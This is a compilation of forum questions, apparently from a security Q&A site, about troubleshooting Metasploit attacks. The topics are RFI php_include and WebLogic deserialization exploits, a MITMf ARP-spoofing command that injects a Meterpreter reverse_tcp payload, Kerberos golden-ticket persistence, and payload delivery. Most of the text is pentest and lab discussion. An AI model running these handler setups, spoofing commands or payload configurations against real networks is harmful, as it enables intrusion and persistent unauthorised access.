Metasploit Exploitation with Virtual Hosts (PHP_Include Exploit)

I am currently trying to build an example of a host vulnerable to Remote File Inclusion vulnerabilities. I have a docker application which hosts 3 vulnerable websites, and in order to access them I have my hosts file set up as follows:

192.168.56.101       Website1.com 192.168.56.101      Website2.com 192.168.56.101       Website3.com 

Website1.com has a RFI vulnerability hosted at Website1.com/settings.php?file=XX where the file parameter has the Remote File Inclusion.

Now, I want to demonstrate getting a Meterpreter shell via Metasploit using the php_include exploit, under (unix/webapp/php_include). I have used this exploit many times in the past, however not with virtual hosting, and I can’t get it too work. Currently my Basic Options are configured as follows:

   Name      Current Setting                                                      Required  Description    ----      ---------------                                                      --------  -----------    HEADERS                                                                        no        Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"    PATH      /                                                                    yes       The base directory to prepend to the URL to try    PHPRFIDB  /usr/share/metasploit-framework/data/exploits/php/rfi-locations.dat  no        A local file containing a list of URLs to try, with XXpathXX replacing the URL    PHPURI    /settings.php?file=XXpathXX                                          no        The URI to request, with the include parameter changed to XXpathXX    POSTDATA                                                                       no        The POST data to send, with the include parameter changed to XXpathXX    Proxies                                                                        no        A proxy chain of format type:host:port[,type:host:port][...]    RHOSTS    192.168.56.101                                                       yes       The target address range or CIDR identifier    RPORT     80                                                                   yes       The target port (TCP)    SRVHOST   0.0.0.0                                                              yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0    SRVPORT   80                                                                   yes       The local port to listen on.    SSL       false                                                                no        Negotiate SSL/TLS for outgoing connections    SSLCert                                                                        no        Path to a custom SSL certificate (default is randomly generated)    URIPATH                                                                        no        The URI to use for this exploit (default is random)    VHOST     Website1.com                                                         no        HTTP server virtual host 

I receive the following output:

[*] Started reverse TCP handler on 192.168.56.102:4443  [-] 192.168.56.101:80 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:80). [*] Exploit completed, but no session was created. 

So I have set it as a virtual host, but to me it looks like Metasploit is trying to connect directly to the RHOST still; maybe I am wrong?

Anyone advise on how to get this working on Virtual Hosts?

Thank you

Metasploit Starts attacking multiple targets, results in “address is already in use”

I am attempting to pentest multiple Weblogic servers, however, when I

“run” or “exploit” or even “exploit -J”,

metasploit begins to attack multiple targets at once, which results in “address is already in use”

msf5 exploit(multi/misc/weblogic_deserialize_unicastref) > run [*] Exploiting target 192.168.27.24 [*] Exploiting target 192.168.27.25 [*] Started reverse TCP handler on 192.168.27.10:4444 [*] Exploiting target 192.168.27.26 [-] Handler failed to bind to 192.168.27.10:4444:-  - [-] Handler failed to bind to 0.0.0.0:4444:-  - [-] 192.168.27.26:7001 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444). 

Here are my options

msf5 exploit(multi/misc/weblogic_deserialize_unicastref) > show options  Module options (exploit/multi/misc/weblogic_deserialize_unicastref):  Name     Current Setting                                Required  Description ----     ---------------                                --------  ----------- RHOSTS   file:/tmp/msf-db-rhosts-20190415-21066-ez3gp8  yes       The target address range or CIDR identifier RPORT    7001                                           yes       The target port (TCP) SRVHOST  0.0.0.0                                        yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT  8080                                           yes       The local port to listen on. SSL      false                                          no        Negotiate SSL for incoming connections SSLCert                                                 no        Path to a custom SSL certificate (default is randomly generated)   Payload options (cmd/unix/reverse_python):  Name   Current Setting  Required  Description ----   ---------------  --------  ----------- LHOST  192.168.27.10    yes       The listen address (an interface may be specified) LPORT  4444             yes       The listen port SHELL  /bin/bash        yes       The system shell to use.   Exploit target:  Id  Name --  ---- 0   Unix 

any ideas what I might be doing wrong?

MITMF Is not connecting Metasploit (HTTP Injection)

I am attempting to inject malicious payload into http request. I own a personal lamp server, a Kali VM and a the most WindowsXP VM imaginable. and everything is on my network and legal. I have been following this tutorial.

I ran metasploit with the following

use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.4 set LPORT 8843 exploit -j 

When watching the video, Metasploit says

[*] Starting the payload handler... 

On my end, it starts by saying that, then brings me back to the console. Odd, but whatever I guess.

Now I am trying to run mitmf in a different terminal window

sudo ./mitmf.py --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.244 --filepwn 

Now this is the error message I am receiving from mitmf.

    [*] MITMf v0.9.8 - 'The Dark Side' | |_ Net-Creds v1.0 online |_ Spoof v0.6 |  |_ ARP spoofing enabled |_ FilePwn v0.3 |  |_ BDFProxy v0.3.2 online 2018-07-17 02:23:27 [ARPpoisoner] Restoring connection 192.168.1.244 <-> 192.168.1.1 with 2 packets per host [Msfrpc] Error connecting to Metasploit: HTTPConnectionPool(host='127.0.0.1', port=55552): Max retries exceeded with url: /api/ (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7fd9b7772290>: Failed to establish a new connection: [Errno 111] Connection refused',)) 

I did some googling and I found this thread.

https://github.com/byt3bl33d3r/MITMf/issues/343

I followed his 2 command instructions instructions and started the whole process over again with no luck. I even tried changing the LPORT to 55552 but that failed as well. I am not an expert with Metasploit so I wouldn’t even begin to know what to look for. How can I further troubleshoot this?

MetaSploit db_import IP Address List

I have confirmed that msfconsole is connected to the database, and I have issued to the following commands…

msf5 > db_import /home/user/hosts [*] Successfully imported /home/user/hosts msf5 > hosts  Hosts =====  address  mac  name  os_name  os_flavor  os_sp  purpose  info  comments -------  ---  ----  -------  ---------  -----  -------  ----  -------- 

The list of IP addresses is vanilla

192.168.2.34 192.168.2.35 192.168.2.36 192.168.2.37 192.168.2.38 

Any ideas what I am doing wrong?

Use Kerberos Golden Ticket with Metasploit

Having compromised a domain controller during testing, I now wish to create persistent domain admin access. Also, operational security is important for me as I don’t want to be logging into netowkr hosts using domain admin credentials.

Having generated a Kerberos golden ticket, I am able to get a SYSTEM cmd shell on domain joined hosts on the network with Impacket’s psexec.py, without having to use administrator credentials.

However I would like to use the tools available within meterpreter with this access.
Is there any way I can use this generated Kerberos ticket with metasploit?

i get no meterpreter in ubuntu metasploit

guys if any one know how to help !!! i’m using os ubuntu 16.4 LTS i install msf and everything work fine i have the latest version it’s connect just fine with db so my problem is that when i create a payload.exe and send him to my windows machine and click on it i get no connection i did everything right first i was think that is fairwal problem so i encoding the payload and disable it and i try in old os like xp without no security and it’s the same i think the problem is that my ubuntu is not connect to the host some how idk because when i use setoolkit on phishing for example i get no return login info i was working with parrot in the past and everything was good and easy anyone know how to fix that please it’s been a week i’m trying search for solutions

Metasploit – Installation problems on arch linux

I am trying to get metasploit up and running on my arch based linux system (Manjaro). While this might sound trivial I am having much more trouble than I expected. I pulled the latest version from the AUR using yay metasploit. It “installed” successfully. However I can’t seem to start it. There is no command “metasploit” or “msf” … What am I supposed to do? I checked the github page of metasploit which has installer scripts, however these don’t work on arch linux.